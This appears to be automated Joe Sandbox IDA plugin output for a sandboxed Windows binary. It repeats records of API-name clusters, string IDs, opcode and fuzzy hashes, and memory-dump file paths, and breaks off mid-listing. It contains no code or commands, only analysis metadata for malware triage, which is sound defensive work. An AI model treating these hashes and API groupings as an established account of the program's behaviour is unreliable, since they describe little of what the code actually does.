      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CreateHandlePipe
      • String ID: nul
      • API String ID: 1424370930-2873401336
      • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
      • Instruction ID: b197f68d3912c54ea17d1d4417df40402dcf97de75d839bc623c3df0e2621dc3
      • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
      • Instruction Fuzzy Hash: C8319F3AA18A0696FB10AB24D415379A3A0EBCAF78F900370DA7D067D4CF3CD444AB21
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Rect$Client$Window$MetricsScreenSystem
      • String ID:
      • API String ID: 3220332590-0
      • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
      • Instruction ID: b2f920bc28a6dbf01baa7afcfffbf7b97cf10e7f1947d35e768385abf34ed788
      • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
      • Instruction Fuzzy Hash: 56A1E06FA1825396F724AF7198057BDB3B0FB44B58F941135EE1997E94EA3D9800F320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: f$p
      • API String ID: 3215553584-1290815066
      • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
      • Instruction ID: cee6ce13a4f5fac7630fed618587f6e27dff3a93d7e1bbc0627a14029d78c0dc
      • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
      • Instruction Fuzzy Hash: 5412A569E0E2C3A5FB20BA14F04667AE671EB40F64FD84372D799076C4DB3DE540AB24
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Variant$ClearCopy$AllocInitString
      • String ID:
      • API String ID: 3859894641-0
      • Opcode ID: cca4d4b4a82fd169e8316434c4ac4a846e76b30b70834abcb80dd3cc97f6a4a2
      • Instruction ID: 1f6d042b7da41ae5eeeae43585a15ce5f53f1919c9a44daa43f2d2fefb82569c
      • Opcode Fuzzy Hash: cca4d4b4a82fd169e8316434c4ac4a846e76b30b70834abcb80dd3cc97f6a4a2
      • Instruction Fuzzy Hash: 52715D6AE09242A1FA28BF25915647CE360FF86B80F9541B6D74E077D1DF2FE911B320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
      • String ID:
      • API String ID: 564229958-0
      • Opcode ID: 972686d896643ff88dab35ced695c458f41fdd6e05e91eac0b5cb7023b787c65
      • Instruction ID: 3f04aa588665bee6918703fe14529588a0a783c3255f82d04b94be56998e6534
      • Opcode Fuzzy Hash: 972686d896643ff88dab35ced695c458f41fdd6e05e91eac0b5cb7023b787c65
      • Instruction Fuzzy Hash: 96517326A18692A6FB20FF70E4422E9A364FFD0784FC00172E64C5769ADFA8D745E750
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: %.15g$0x%p$False$True
      • API String ID: 0-2263619337
      • Opcode ID: b4f339c1a008b25c745027f1729257de4a6e326c1301c069ea846767a1adc173
      • Instruction ID: f5d4ba507ad3e003ad2abb2b1180b0b7aefb56f98073dc99294171542e68be0a
      • Opcode Fuzzy Hash: b4f339c1a008b25c745027f1729257de4a6e326c1301c069ea846767a1adc173
      • Instruction Fuzzy Hash: A151B53AB0AA46A5FF10FB65E0421BCB375EB84B88F948671DA0D47795CE39D405E360
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
      • String ID:
      • API String ID: 2592858361-0
      • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
      • Instruction ID: 2fe47e6e22a9d235e5adbbfd491bfbefd5dda2baaf0cd5ac2b3f23822c397bec
      • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
      • Instruction Fuzzy Hash: 7751BC3AA08782A6F720EB11E445379B764FB89B94F8042B5DEAD47B94CF3CE405E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
      • String ID:
      • API String ID: 383626216-0
      • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
      • Instruction ID: bbdb28f1ec994dc7934ba50a34e89af355bdfe353f44cdf7b86dc14e743e89ab
      • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
      • Instruction Fuzzy Hash: 9431CD37B056529BF314DF21D881BAC73A5FB98748F800239EA4A53A94DF38E9499B40
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
      • String ID:
      • API String ID: 2082702847-0
      • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
      • Instruction ID: a3c3c97da66035fc4c15ff887d32d9be0c32650a5c0cbc5485c4d163e98cbcbb
      • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
      • Instruction Fuzzy Hash: 95216D29A09742A5FE18FB70A406279E290AFC4BB4F980774EA2D467D4DF3CE404B221
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CapsDevice$Release
      • String ID:
      • API String ID: 1035833867-0
      • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
      • Instruction ID: 4f4cddccc00663afdee8d920d740426de4919e8a499109d4f6d03f6a63ab6d91
      • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
      • Instruction Fuzzy Hash: E811A039B1471186FB08DF629809029A7A5FF88BC1F808078EE0E87B94CE3DD801A700
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
      • String ID:
      • API String ID: 43455801-0
      • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
      • Instruction ID: d32ba1abfd7d81572975491438c9fead8ebea214b246107dc9c921f045e745fa
      • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
      • Instruction Fuzzy Hash: 2611C139B18682A6F714AB15B806768BB64EFC5F84F884170DF1A03B50CF7DE445E750
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Virtual
      • String ID:
      • API String ID: 4278518827-0
      • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
      • Instruction ID: a8b8edcd1290aee20c08525ac3ae502f10de1729253416bb63c5deb3afc19b92
      • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
      • Instruction Fuzzy Hash: 9E115E729066408AE34CDF39DC481197BB6FB98B08B98C078C6498F269EF39D49AD710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
      • String ID:
      • API String ID: 839392675-0
      • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
      • Instruction ID: 56fa9e8a3042fce6de0706a0b06d7bccdf3454be4bc7975156e3947a843d6472
      • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
      • Instruction Fuzzy Hash: 3E01A236B1474197FB14EB21E805A29B361FFC9B95F849134EE0A46B14DF3CD048EB00
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
      • String ID:
      • API String ID: 179993514-0
      • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
      • Instruction ID: d130a2358976880a90a7cad2945273f0d3b3ca2d58ae7c8176e47014c4b7d0f5
      • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
      • Instruction Fuzzy Hash: 1EF0C829F1875157F7546B71B84A629E395BFC8744FC440B4E90E42B54DF3DD084BB10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
      • String ID:
      • API String ID: 146765662-0
      • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
      • Instruction ID: 7642cd2236f79747de5c341d3447e17170bfdc4da6531a804999f022b8e8c7dc
      • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
      • Instruction Fuzzy Hash: 64F03029A14A01D6FB04FF76DC55028A365FFC8FA5B848171DD1E86378CE3CD485A310
      APIs
      • GetForegroundWindow.USER32 ref: 00007FF73A240EDB
        • Part of subcall function 00007FF73A240B90: CharUpperBuffW.USER32(?,?,00000001,00007FF73A240F61), ref: 00007FF73A240C6A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: BuffCharForegroundUpperWindow
      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
      • API String ID: 3570115564-1994484594
      • Opcode ID: 7c257ca8d76c0aa10b9ff23c4fdb9d550ebcebe8798a519d819cbaa0415aa93d
      • Instruction ID: e6fc2dc326c5f37c2cc2d990474b3f3ad631c4c758c803202aab19dbb8930bc3
      • Opcode Fuzzy Hash: 7c257ca8d76c0aa10b9ff23c4fdb9d550ebcebe8798a519d819cbaa0415aa93d
      • Instruction Fuzzy Hash: 2C71A21AB0DA5361FA64FB66E4032B9F3A1AFD4784FC440B1DA0E46695EF7CE544B320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: BuffCharUpper
      • String ID: APPEND$EXISTS$KEYS$REMOVE
      • API String ID: 3964851224-769500911
      • Opcode ID: 8fad6df3d2de31fcd3267e08c4545b9e73bd12658db8fa539acfef1871b399d7
      • Instruction ID: a042508ced91c8a5d1ed3fcf375368784ab3e353e174ab2dcd43434993ab22f6
      • Opcode Fuzzy Hash: 8fad6df3d2de31fcd3267e08c4545b9e73bd12658db8fa539acfef1871b399d7
      • Instruction Fuzzy Hash: 4E41F73BF1DA6351FA606F279506179E3D1AB94BD0B940671CA5D83784EE3DE842B320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: #$E$O
      • API String ID: 3215553584-248080428
      • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
      • Instruction ID: da58894468191f60f1be2f43ddd443056dfe6f4ca241967763efbde1e1913479
      • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
      • Instruction Fuzzy Hash: D341A22AE19751A5FF51EF2298411ADA3A0BF98B98F484471EE4E07758DF3CD441F321
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$ClassName
      • String ID: ComboBox$ListBox
      • API String ID: 787153527-1403004172
      • Opcode ID: 5ccca390760844e887d5499293da284947221a1f387048848ff0e45d29c0f7a5
      • Instruction ID: bffb4a11e0801c70c9c9f277709d3b27bcaa20d91f3669abcdc23e3fed12b63d
      • Opcode Fuzzy Hash: 5ccca390760844e887d5499293da284947221a1f387048848ff0e45d29c0f7a5
      • Instruction Fuzzy Hash: 9931D12AA09642A6FA20EB15E4421B9F3A0FBC6B80FC44271DE5D477D5DE3CE149E720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
      • String ID: SysAnimate32
      • API String ID: 4146253029-1011021900
      • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
      • Instruction ID: 05f41472d74efeb73674967205fa308518587463586b25866cd476ba982e5b33
      • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
      • Instruction Fuzzy Hash: 0531CF36A087D1DAE7A0AF25E44176AB3A0FB85B80F904179DA5D43B85DF3DD440EF10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AddressFreeHandleLibraryModuleProc
      • String ID: CorExitProcess$mscoree.dll
      • API String ID: 4061214504-1276376045
      • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
      • Instruction ID: 9204727718d5ee818413f85f8bfaeac9657925910063647aec9abce3c0bb6de5
      • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
      • Instruction Fuzzy Hash: 25F04429A1EA82A1FE44BB11F445279A3A4EFC8790FC81075FA0F86755DE3CD444E720
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
